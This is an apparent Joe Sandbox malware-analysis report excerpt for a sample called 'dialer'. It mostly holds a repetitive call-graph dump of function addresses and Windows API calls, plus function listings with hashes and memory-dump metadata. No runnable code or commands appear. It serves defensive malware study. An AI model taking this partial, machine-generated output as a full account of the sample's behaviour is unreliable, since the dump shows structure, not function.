wcslen memset 2535 14000157b 2321->2535 2322->2321 2324 14000468f memset 2326 1400046be 2324->2326 2325 140004703 wcscpy wcscat wcslen 2576 14000146d 2325->2576 2326->2325 2330 140004679 2331 14000145e 2 API calls 2330->2331 2334 140004674 2331->2334 2332 1400048a3 2339 1400048e2 memset 2332->2339 2333 14000157b 2 API calls 2369 140004135 2333->2369 2334->2324 2337 140004813 2662 1400014a9 2337->2662 2338 1400048bf 2341 14000145e 2 API calls 2338->2341 2343 140006294 2339->2343 2344 140004906 wcscpy wcscat wcslen 2339->2344 2341->2332 2386 140004a30 2344->2386 2347 1400048af 2352 14000145e 2 API calls 2347->2352 2348 14000145e 2 API calls 2348->2369 2350 1400044a4 _wcsnicmp 2354 14000465c 2350->2354 2350->2369 2352->2332 2356 14000145e 2 API calls 2354->2356 2355 140004897 2357 14000145e 2 API calls 2355->2357 2360 140004668 2356->2360 2357->2332 2358 140004502 _wcsnicmp 2358->2354 2358->2369 2359 140004b29 wcslen 2361 14000153f 2 API calls 2359->2361 2362 14000145e 2 API calls 2360->2362 2361->2386 2362->2334 2363 140005e3f memcpy 2363->2386 2364 140004556 _wcsnicmp 2364->2354 2364->2369 2365 14000145e NtResetWriteWatch malloc 2365->2386 2366 140004c9d wcslen 2370 14000153f 2 API calls 2366->2370 2367 140004327 wcsstr 2367->2354 2367->2369 2368 140005f7c memcpy 2368->2386 2369->2324 2369->2330 2369->2333 2369->2348 2369->2350 2369->2358 2369->2364 2369->2367 2552 140001599 2369->2552 2565 1400015a8 2369->2565 2370->2386 2371 14000515d wcslen 2373 14000153f 2 API calls 2371->2373 2372 140004ef1 wcslen 2374 14000157b 2 API calls 2372->2374 2373->2386 2374->2386 2375 140005ad1 wcscpy wcscat wcslen 2378 140001422 2 API calls 2375->2378 2376 140005fb4 memcpy 2376->2386 2377 140004f74 memset 2377->2386 2378->2386 2379 140004fde wcslen 2380 1400015a8 2 API calls 2379->2380 2380->2386 2383 140005046 _wcsnicmp 2383->2386 2384 140005c1c 2384->2265 2385 140005cc7 wcslen 2387 1400015a8 2 API calls 2385->2387 2386->2359 2386->2363 2386->2365 2386->2366 2386->2368 2386->2371 2386->2372 2386->2375 2386->2376 2386->2377 2386->2379 2386->2383 2386->2384 2386->2385 2388 140005874 memset 2386->2388 2389 1400027d0 11 API calls 2386->2389 2390 140005a70 memset 2386->2390 2391 1400060a6 memcpy 2386->2391 2392 1400058db memset 2386->2392 2393 140005935 wcscpy wcscat wcslen 2386->2393 2778 1400014d6 2386->2778 2823 140001521 2386->2823 2921 140001431 2386->2921 2387->2386 2388->2386 2388->2390 2389->2386 2390->2386 2391->2386 2392->2386 2852 140001422 2393->2852 2396 140001394 2 API calls 2395->2396 2397 14000154e 2396->2397 2398 140001394 2 API calls 2397->2398 2399 14000155d 2398->2399 2400 140001394 2 API calls 2399->2400 2401 14000156c 2400->2401 2402 140001394 2 API calls 2401->2402 2403 14000157b 2402->2403 2404 140001394 2 API calls 2403->2404 2405 14000158a 2404->2405 2406 140001394 2 API calls 2405->2406 2407 140001599 2406->2407 2408 140001394 2 API calls 2407->2408 2409 1400015a8 2408->2409 2410 140001394 2 API calls 2409->2410 2411 1400015b7 2410->2411 2412 140001394 2 API calls 2411->2412 2413 1400015c6 2412->2413 2414 140001394 2 API calls 2413->2414 2415 1400015d5 2414->2415 2416 140001394 2 API calls 2415->2416 2417 1400015e4 2416->2417 2418 140001394 2 API calls 2417->2418 2419 1400015f3 2418->2419 2419->2288 2420 140001503 2419->2420 2421 140001394 2 API calls 2420->2421 2422 14000150d 2421->2422 2423 140001394 2 API calls 2422->2423 2424 140001512 2423->2424 2425 140001394 2 API calls 2424->2425 2426 140001521 2425->2426 2427 140001394 2 API calls 2426->2427 2428 140001530 2427->2428 2429 140001394 2 API calls 2428->2429 2430 14000153f 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000154e 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000155d 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000156c 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000157b 2437->2438 2439 140001394 2 API calls 2438->2439 2440 14000158a 2439->2440 2441 140001394 2 API calls 2440->2441 2442 140001599 2441->2442 2443 140001394 2 API calls 2442->2443 2444 1400015a8 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015b7 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015c6 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015d5 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015e4 2451->2452 2453 140001394 2 API calls 2452->2453 2454 1400015f3 2453->2454 2454->2291 2455 14000156c 2454->2455 2456 140001394 2 API calls 2455->2456 2457 14000157b 2456->2457 2458 140001394 2 API calls 2457->2458 2459 14000158a 2458->2459 2460 140001394 2 API calls 2459->2460 2461 140001599 2460->2461 2462 140001394 2 API calls 2461->2462 2463 1400015a8 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015b7 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015c6 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015d5 2468->2469 2470 140001394 2 API calls 2469->2470 2471 1400015e4 2470->2471 2472 140001394 2 API calls 2471->2472 2473 1400015f3 2472->2473 2473->2291 2474 14000145e 2473->2474 2475 140001394 2 API calls 2474->2475 2476 14000146d 2475->2476 2477 140001394 2 API calls 2476->2477 2478 14000147c 2477->2478 2479 140001394 2 API calls 2478->2479 2480 14000148b 2479->2480 2481 140001394 2 API calls 2480->2481 2482 14000149a 2481->2482 2483 140001394 2 API calls 2482->2483 2484 1400014a9 2483->2484 2485 140001394 2 API calls 2484->2485 2486 1400014b8 2485->2486 2487 140001394 2 API calls 2486->2487 2488 1400014c7 2487->2488 2489 140001394 2 API calls 2488->2489 2490 1400014d6 2489->2490 2491 1400014e5 2490->2491 2492 140001394 2 API calls 2490->2492 2493 140001394 2 API calls 2491->2493 2492->2491 2494 1400014ef 2493->2494 2495 1400014f4 2494->2495 2496 140001394 2 API calls 2494->2496 2497 140001394 2 API calls 2495->2497 2496->2495 2498 1400014fe 2497->2498 2499 140001503 2498->2499 2500 140001394 2 API calls 2498->2500 2501 140001394 2 API calls 2499->2501 2500->2499 2502 14000150d 2501->2502 2503 140001394 2 API calls 2502->2503 2504 140001512 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001521 2505->2506 2507 140001394 2 API calls 2506->2507 2508 140001530 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000153f 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000154e 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000155d 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000156c 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000157b 2517->2518 2519 140001394 2 API calls 2518->2519 2520 14000158a 2519->2520 2521 140001394 2 API calls 2520->2521 2522 140001599 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015a8 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015b7 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015c6 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015d5 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015e4 2531->2532 2533 140001394 2 API calls 2532->2533 2534 1400015f3 2533->2534 2534->2291 2536 140001394 2 API calls 2535->2536 2537 14000158a 2536->2537 2538 140001394 2 API calls 2537->2538 2539 140001599 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400015a8 2540->2541 2542 140001394 2 API calls 2541->2542 2543 1400015b7 2542->2543 2544 140001394 2 API calls 2543->2544 2545 1400015c6 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400015d5 2546->2547 2548 140001394 2 API calls 2547->2548 2549 1400015e4 2548->2549 2550 140001394 2 API calls 2549->2550 2551 1400015f3 2550->2551 2551->2369 2553 140001394 2 API calls 2552->2553 2554 1400015a8 2553->2554 2555 140001394 2 API calls 2554->2555 2556 1400015b7 2555->2556 2557 140001394 2 API calls 2556->2557 2558 1400015c6 2557->2558 2559 140001394 2 API calls 2558->2559 2560 1400015d5 2559->2560 2561 140001394 2 API calls 2560->2561 2562 1400015e4 2561->2562 2563 140001394 2 API calls 2562->2563 2564 1400015f3 2563->2564 2564->2369 2566 140001394 2 API calls 2565->2566 2567 1400015b7 2566->2567 2568 140001394 2 API calls 2567->2568 2569 1400015c6 2568->2569 2570 140001394 2 API calls 2569->2570 2571 1400015d5 2570->2571 2572 140001394 2 API calls 2571->2572 2573 1400015e4 2572->2573 2574 140001394 2 API calls 2573->2574 2575 1400015f3 2574->2575 2575->2369 2577 140001394 2 API calls 2576->2577 2578 14000147c 2577->2578 2579 140001394 2 API calls 2578->2579 2580 14000148b 2579->2580 2581 140001394 2 API calls 2580->2581 2582 14000149a 2581->2582 2583 140001394 2 API calls 2582->2583 2584 1400014a9 2583->2584 2585 140001394 2 API calls 2584->2585 2586 1400014b8 2585->2586 2587 140001394 2 API calls 2586->2587 2588 1400014c7 2587->2588 2589 140001394 2 API calls 2588->2589 2590 1400014d6 2589->2590 2591 1400014e5 2590->2591 2592 140001394 2 API calls 2590->2592 2593 140001394 2 API calls 2591->2593 2592->2591 2594 1400014ef 2593->2594 2595 1400014f4 2594->2595 2596 140001394 2 API calls 2594->2596 2597 140001394 2 API calls 2595->2597 2596->2595 2598 1400014fe 2597->2598 2599 140001503 2598->2599 2600 140001394 2 API calls 2598->2600 2601 140001394 2 API calls 2599->2601 2600->2599 2602 14000150d 2601->2602 2603 140001394 2 API calls 2602->2603 2604 140001512 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001521 2605->2606 2607 140001394 2 API calls 2606->2607 2608 140001530 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000153f 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000154e 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000155d 2613->2614 2615 140001394 2 API calls 2614->2615 2616 14000156c 2615->2616 2617 140001394 2 API calls 2616->2617 2618 14000157b 2617->2618 2619 140001394 2 API calls 2618->2619 2620 14000158a 2619->2620 2621 140001394 2 API calls 2620->2621 2622 140001599 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015a8 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015b7 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015c6 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015d5 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015e4 2631->2632 2633 140001394 2 API calls 2632->2633 2634 1400015f3 2633->2634 2634->2332 2635 140001530 2634->2635 2636 140001394 2 API calls 2635->2636 2637 14000153f 2636->2637 2638 140001394 2 API calls 2637->2638 2639 14000154e 2638->2639 2640 140001394 2 API calls 2639->2640 2641 14000155d 2640->2641 2642 140001394 2 API calls 2641->2642 2643 14000156c 2642->2643 2644 140001394 2 API calls 2643->2644 2645 14000157b 2644->2645 2646 140001394 2 API calls 2645->2646 2647 14000158a 2646->2647 2648 140001394 2 API calls 2647->2648 2649 140001599 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015a8 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015b7 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015c6 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015d5 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015e4 2658->2659 2660 140001394 2 API calls 2659->2660 2661 1400015f3 2660->2661 2661->2337 2661->2338 2663 140001394 2 API calls 2662->2663 2664 1400014b8 2663->2664 2665 140001394 2 API calls 2664->2665 2666 1400014c7 2665->2666 2667 140001394 2 API calls 2666->2667 2668 1400014d6 2667->2668 2669 1400014e5 2668->2669 2670 140001394 2 API calls 2668->2670 2671 140001394 2 API calls 2669->2671 2670->2669 2672 1400014ef 2671->2672 2673 1400014f4 2672->2673 2674 140001394 2 API calls 2672->2674 2675 140001394 2 API calls 2673->2675 2674->2673 2676 1400014fe 2675->2676 2677 140001503 2676->2677 2678 140001394 2 API calls 2676->2678 2679 140001394 2 API calls 2677->2679 2678->2677 2680 14000150d 2679->2680 2681 140001394 2 API calls 2680->2681 2682 140001512 2681->2682 2683 140001394 2 API calls 2682->2683 2684 140001521 2683->2684 2685 140001394 2 API calls 2684->2685 2686 140001530 2685->2686 2687 140001394 2 API calls 2686->2687 2688 14000153f 2687->2688 2689 140001394 2 API calls 2688->2689 2690 14000154e 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000155d 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000156c 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000157b 2695->2696 2697 140001394 2 API calls 2696->2697 2698 14000158a 2697->2698 2699 140001394 2 API calls 2698->2699 2700 140001599 2699->2700 2701 140001394 2 API calls 2700->2701 2702 1400015a8 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400015b7 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400015c6 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400015d5 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400015e4 2709->2710 2711 140001394 2 API calls 2710->2711 2712 1400015f3 2711->2712 2712->2347 2713 140001440 2712->2713 2714 140001394 2 API calls 2713->2714 2715 14000144f 2714->2715 2716 140001394 2 API calls 2715->2716 2717 14000145e 2716->2717 2718 140001394 2 API calls 2717->2718 2719 14000146d 2718->2719 2720 140001394 2 API calls 2719->2720 2721 14000147c 2720->2721 2722 140001394 2 API calls 2721->2722 2723 14000148b 2722->2723 2724 140001394 2 API calls 2723->2724 2725 14000149a 2724->2725 2726 140001394 2 API calls 2725->2726 2727 1400014a9 2726->2727 2728 140001394 2 API calls 2727->2728 2729 1400014b8 2728->2729 2730 140001394 2 API calls 2729->2730 2731 1400014c7 2730->2731 2732 140001394 2 API calls 2731->2732 2733 1400014d6 2732->2733 2734 1400014e5 2733->2734 2735 140001394 2 API calls 2733->2735 2736 140001394 2 API calls 2734->2736 2735->2734 2737 1400014ef 2736->2737 2738 1400014f4 2737->2738 2739 140001394 2 API calls 2737->2739 2740 140001394 2 API calls 2738->2740 2739->2738 2741 1400014fe 2740->2741 2742 140001503 2741->2742 2743 140001394 2 API calls 2741->2743 2744 140001394 2 API calls 2742->2744 2743->2742 2745 14000150d 2744->2745 2746 140001394 2 API calls 2745->2746 2747 140001512 2746->2747 2748 140001394 2 API calls 2747->2748 2749 140001521 2748->2749 2750 140001394 2 API calls 2749->2750 2751 140001530 2750->2751 2752 140001394 2 API calls 2751->2752 2753 14000153f 2752->2753 2754 140001394 2 API calls 2753->2754 2755 14000154e 2754->2755 2756 140001394 2 API calls 2755->2756 2757 14000155d 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000156c 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000157b 2760->2761 2762 140001394 2 API calls 2761->2762 2763 14000158a 2762->2763 2764 140001394 2 API calls 2763->2764 2765 140001599 2764->2765 2766 140001394 2 API calls 2765->2766 2767 1400015a8 2766->2767 2768 140001394 2 API calls 2767->2768 2769 1400015b7 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400015c6 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400015d5 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400015e4 2774->2775 2776 140001394 2 API calls 2775->2776 2777 1400015f3 2776->2777 2777->2347 2777->2355 2779 1400014e5 2778->2779 2780 140001394 2 API calls 2778->2780 2781 140001394 2 API calls 2779->2781 2780->2779 2782 1400014ef 2781->2782 2783 1400014f4 2782->2783 2784 140001394 2 API calls 2782->2784 2785 140001394 2 API calls 2783->2785 2784->2783 2786 1400014fe 2785->2786 2787 140001503 2786->2787 2788 140001394 2 API calls 2786->2788 2789 140001394 2 API calls 2787->2789 2788->2787 2790 14000150d 2789->2790 2791 140001394 2 API calls 2790->2791 2792 140001512 2791->2792 2793 140001394 2 API calls 2792->2793 2794 140001521 2793->2794 2795 140001394 2 API calls 2794->2795 2796 140001530 2795->2796 2797 140001394 2 API calls 2796->2797 2798 14000153f 2797->2798 2799 140001394 2 API calls 2798->2799 2800 14000154e 2799->2800 2801 140001394 2 API calls 2800->2801 2802 14000155d 2801->2802 2803 140001394 2 API calls 2802->2803 2804 14000156c 2803->2804 2805 140001394 2 API calls 2804->2805 2806 14000157b 2805->2806 2807 140001394 2 API calls 2806->2807 2808 14000158a 2807->2808 2809 140001394 2 API calls 2808->2809 2810 140001599 2809->2810 2811 140001394 2 API calls 2810->2811 2812 1400015a8 2811->2812 2813 140001394 2 API calls 2812->2813 2814 1400015b7 2813->2814 2815 140001394 2 API calls 2814->2815 2816 1400015c6 2815->2816 2817 140001394 2 API calls 2816->2817 2818 1400015d5 2817->2818 2819 140001394 2 API calls 2818->2819 2820 1400015e4 2819->2820 2821 140001394 2 API calls 2820->2821 2822 1400015f3 2821->2822 2822->2386 2824 140001394 2 API calls 2823->2824 2825 140001530 2824->2825 2826 140001394 2 API calls 2825->2826 2827 14000153f 2826->2827 2828 140001394 2 API calls 2827->2828 2829 14000154e 2828->2829 2830 140001394 2 API calls 2829->2830 2831 14000155d 2830->2831 2832 140001394 2 API calls 2831->2832 2833 14000156c 2832->2833 2834 140001394 2 API calls 2833->2834 2835 14000157b 2834->2835 2836 140001394 2 API calls 2835->2836 2837 14000158a 2836->2837 2838 140001394 2 API calls 2837->2838 2839 140001599 2838->2839 2840 140001394 2 API calls 2839->2840 2841 1400015a8 2840->2841 2842 140001394 2 API calls 2841->2842 2843 1400015b7 2842->2843 2844 140001394 2 API calls 2843->2844 2845 1400015c6 2844->2845 2846 140001394 2 API calls 2845->2846 2847 1400015d5 2846->2847 2848 140001394 2 API calls 2847->2848 2849 1400015e4 2848->2849 2850 140001394 2 API calls 2849->2850 2851 1400015f3 2850->2851 2851->2386 2853 140001394 2 API calls 2852->2853 2854 140001431 2853->2854 2855 140001394 2 API calls 2854->2855 2856 140001440 2855->2856 2857 140001394 2 API calls 2856->2857 2858 14000144f 2857->2858 2859 140001394 2 API calls 2858->2859 2860 14000145e 2859->2860 2861 140001394 2 API calls 2860->2861 2862 14000146d 2861->2862 2863 140001394 2 API calls 2862->2863 2864 14000147c 2863->2864 2865 140001394 2 API calls 2864->2865 2866 14000148b 2865->2866 2867 140001394 2 API calls 2866->2867 2868 14000149a 2867->2868 2869 140001394 2 API calls 2868->2869 2870 1400014a9 2869->2870 2871 140001394 2 API calls 2870->2871 2872 1400014b8 2871->2872 2873 140001394 2 API calls 2872->2873 2874 1400014c7 2873->2874 2875 140001394 2 API calls 2874->2875 2876 1400014d6 2875->2876 2877 1400014e5 2876->2877 2878 140001394 2 API calls 2876->2878 2879 140001394 2 API calls 2877->2879 2878->2877 2880 1400014ef 2879->2880 2881 1400014f4 2880->2881 2882 140001394 2 API calls 2880->2882 2883 140001394 2 API calls 2881->2883 2882->2881 2884 1400014fe 2883->2884 2885 140001503 2884->2885 2886 140001394 2 API calls 2884->2886 2887 140001394 2 API calls 2885->2887 2886->2885 2888 14000150d 2887->2888 2889 140001394 2 API calls 2888->2889 2890 140001512 2889->2890 2891 140001394 2 API calls 2890->2891 2892 140001521 2891->2892 2893 140001394 2 API calls 2892->2893 2894 140001530 2893->2894 2895 140001394 2 API calls 2894->2895 2896 14000153f 2895->2896 2897 140001394 2 API calls 2896->2897 2898 14000154e 2897->2898 2899 140001394 2 API calls 2898->2899 2900 14000155d 2899->2900 2901 140001394 2 API calls 2900->2901 2902 14000156c 2901->2902 2903 140001394 2 API calls 2902->2903 2904 14000157b 2903->2904 2905 140001394 2 API calls 2904->2905 2906 14000158a 2905->2906 2907 140001394 2 API calls 2906->2907 2908 140001599 2907->2908 2909 140001394 2 API calls 2908->2909 2910 1400015a8 2909->2910 2911 140001394 2 API calls 2910->2911 2912 1400015b7 2911->2912 2913 140001394 2 API calls 2912->2913 2914 1400015c6 2913->2914 2915 140001394 2 API calls 2914->2915 2916 1400015d5 2915->2916 2917 140001394 2 API calls 2916->2917 2918 1400015e4 2917->2918 2919 140001394 2 API calls 2918->2919 2920 1400015f3 2919->2920 2920->2386 2922 140001394 2 API calls 2921->2922 2923 140001440 2922->2923 2924 140001394 2 API calls 2923->2924 2925 14000144f 2924->2925 2926 140001394 2 API calls 2925->2926 2927 14000145e 2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000146d 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000147c 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000148b 2932->2933 2934 140001394 2 API calls 2933->2934 2935 14000149a 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014a9 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014b8 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014c7 2940->2941 2942 140001394 2 API calls 2941->2942 2943 1400014d6 2942->2943 2944 1400014e5 2943->2944 2945 140001394 2 API calls 2943->2945 2946 140001394 2 API calls 2944->2946 2945->2944 2947 1400014ef 2946->2947 2948 1400014f4 2947->2948 2949 140001394 2 API calls 2947->2949 2950 140001394 2 API calls 2948->2950 2949->2948 2951 1400014fe 2950->2951 2952 140001503 2951->2952 2953 140001394 2 API calls 2951->2953 2954 140001394 2 API calls 2952->2954 2953->2952 2955 14000150d 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001512 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001521 2958->2959 2960 140001394 2 API calls 2959->2960 2961 140001530 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000153f 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000154e 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000155d 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000156c 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000157b 2970->2971 2972 140001394 2 API calls 2971->2972 2973 14000158a 2972->2973 2974 140001394 2 API calls 2973->2974 2975 140001599 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015a8 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015b7 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015c6 2980->2981 2982 140001394 2 API calls 2981->2982 2983 1400015d5 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015e4 2984->2985 2986 140001394 2 API calls 2985->2986 2987 1400015f3 2986->2987 2987->2386

                                                              Callgraph

                                                              • Executed
                                                              • Not Executed
                                                              • Opacity -> Relevance
                                                              • Disassembly available
                                                              callgraph 0 Function_00000001400026E1 1 Function_00000001400064E1 2 Function_0000000140001AE4 36 Function_0000000140001D40 2->36 79 Function_0000000140001BA0 2->79 3 Function_00000001400014E5 75 Function_0000000140001394 3->75 4 Function_0000000140002FF0 60 Function_0000000140001370 4->60 5 Function_00000001400010F0 6 Function_00000001400063F1 7 Function_00000001400062F1 8 Function_00000001400031F1 9 Function_00000001400014F4 9->75 10 Function_0000000140002500 11 Function_0000000140001800 71 Function_0000000140002290 11->71 12 Function_0000000140001000 13 Function_0000000140001E00 12->13 42 Function_0000000140001750 12->42 88 Function_0000000140001FB0 12->88 93 Function_0000000140001FC0 12->93 14 Function_0000000140001503 14->75 15 Function_0000000140001404 15->75 16 Function_0000000140002104 17 Function_0000000140001E10 18 Function_0000000140003210 19 Function_0000000140006311 20 Function_0000000140006411 21 Function_0000000140001512 21->75 22 Function_0000000140006420 23 Function_0000000140002320 24 Function_0000000140002420 25 Function_0000000140006920 50 Function_0000000140006660 25->50 26 Function_0000000140001521 26->75 27 Function_0000000140001422 27->75 28 Function_0000000140001530 28->75 29 Function_0000000140003230 30 Function_0000000140001431 30->75 31 Function_0000000140006331 32 Function_000000014000153F 32->75 33 Function_0000000140001440 33->75 34 Function_0000000140006640 35 Function_0000000140001140 51 Function_0000000140001160 35->51 36->71 37 Function_0000000140006441 38 Function_0000000140003141 39 Function_0000000140001F47 59 Function_0000000140001870 39->59 40 Function_0000000140002050 41 Function_0000000140003250 41->4 41->14 41->26 41->27 41->28 41->30 41->32 41->33 48 Function_000000014000145E 41->48 49 Function_0000000140002660 41->49 41->50 56 Function_000000014000156C 41->56 57 Function_000000014000146D 41->57 41->60 65 Function_000000014000157B 41->65 77 Function_0000000140001599 41->77 85 Function_00000001400015A8 41->85 86 Function_00000001400014A9 41->86 94 Function_00000001400016C0 41->94 99 Function_00000001400027D0 41->99 106 Function_00000001400014D6 41->106 43 Function_0000000140001650 44 Function_0000000140002751 45 Function_0000000140006351 46 Function_0000000140006551 47 Function_000000014000155D 47->75 48->75 51->41 51->51 51->59 66 Function_0000000140001880 51->66 70 Function_0000000140001F90 51->70 51->94 52 Function_0000000140001760 108 Function_00000001400020E0 52->108 53 Function_0000000140002460 54 Function_0000000140003160 55 Function_0000000140001E65 55->59 56->75 57->75 58 Function_000000014000216F 61 Function_0000000140006670 61->50 62 Function_0000000140001A70 62->36 62->79 63 Function_0000000140002770 64 Function_0000000140006471 65->75 66->24 66->36 66->49 66->79 67 Function_0000000140003180 68 Function_0000000140006381 69 Function_0000000140006581 72 Function_0000000140002590 73 Function_0000000140002790 74 Function_0000000140002691 75->25 75->61 76 Function_0000000140002194 76->59 77->75 78 Function_000000014000219E 79->36 87 Function_00000001400023B0 79->87 98 Function_00000001400024D0 79->98 80 Function_0000000140001FA0 81 Function_00000001400027A0 82 Function_00000001400031A1 83 Function_00000001400063A1 84 Function_00000001400064A1 85->75 86->75 89 Function_00000001400022B0 90 Function_00000001400026B0 91 Function_00000001400027B1 92 Function_0000000140001AB3 92->36 92->79 95 Function_00000001400063C1 96 Function_0000000140001AC3 96->36 96->79 97 Function_00000001400014C7 97->75 99->3 99->9 99->14 99->21 99->47 99->48 99->49 99->50 99->60 99->86 99->97 100 Function_00000001400017D0 101 Function_0000000140001FD0 102 Function_00000001400026D0 103 Function_00000001400062D1 104 Function_00000001400065D1 105 Function_0000000140001AD4 105->36 105->79 106->75 107 Function_00000001400017E0 107->108 109 Function_00000001400022E0

                                                              Executed Functions

                                                              Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • NtResetWriteWatch.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: ResetWatchWrite
                                                              • String ID:
                                                              • API String ID: 473789334-0
                                                              • Opcode ID: db3a2adbfd885308611a8e34f6847f87a6f17780172e7325b61373531d395d4d
                                                              • Instruction ID: d3c3cf79118e968cc42332799ff90b96b74b9ead5fc78a259f0acec360665963
                                                              • Opcode Fuzzy Hash: db3a2adbfd885308611a8e34f6847f87a6f17780172e7325b61373531d395d4d
                                                              • Instruction Fuzzy Hash: 35F09DB6608B408AEA12DB62F85179A77A5F38C7C0F009919BBC853735DB38C190CB40

                                                              Non-executed Functions

                                                              Function 00000001400027D0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 376COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 385 1400027d0-14000282b call 140002660 memset 388 140002831-14000283b 385->388 389 1400028fe-14000294e call 14000155d 385->389 391 140002864-14000286a 388->391 394 140002a43-140002a6b call 1400014c7 389->394 395 140002954-140002963 389->395 391->389 393 140002870-140002877 391->393 396 140002879-140002882 393->396 397 140002840-140002842 393->397 411 140002a76-140002ab8 call 140001503 call 140006660 memset 394->411 412 140002a6d 394->412 401 140002fa7-140002fe4 call 140001370 395->401 402 140002969-140002978 395->402 399 140002884-14000289b 396->399 400 1400028e8-1400028eb 396->400 403 14000284a-14000285e 397->403 405 1400028e5 399->405 406 14000289d-1400028b2 399->406 400->403 407 1400029d4-140002a3e wcsncmp call 1400014e5 402->407 408 14000297a-1400029cd 402->408 403->389 403->391 405->400 413 1400028c0-1400028c7 406->413 407->394 408->407 421 140002f39-140002f74 call 140001370 411->421 422 140002abe-140002ac5 411->422 412->411 415 1400028c9-1400028e3 413->415 416 1400028f0-1400028f9 413->416 415->405 415->413 416->403 425 140002ac7-140002afc 421->425 429 140002f7a 421->429 424 140002b03-140002b33 wcscpy wcscat wcslen 422->424 422->425 427 140002b35-140002b66 wcslen 424->427 428 140002b68-140002b95 424->428 425->424 430 140002b98-140002baf wcslen 427->430 428->430 429->424 431 140002bb5-140002bc8 430->431 432 140002f7f-140002f9b call 140001370 430->432 434 140002be5-140002eeb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 431->434 435 140002bca-140002bde 431->435 432->401 453 140002eed-140002f0b call 140001512 434->453 454 140002f10-140002f38 call 14000145e 434->454 435->434 453->454
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
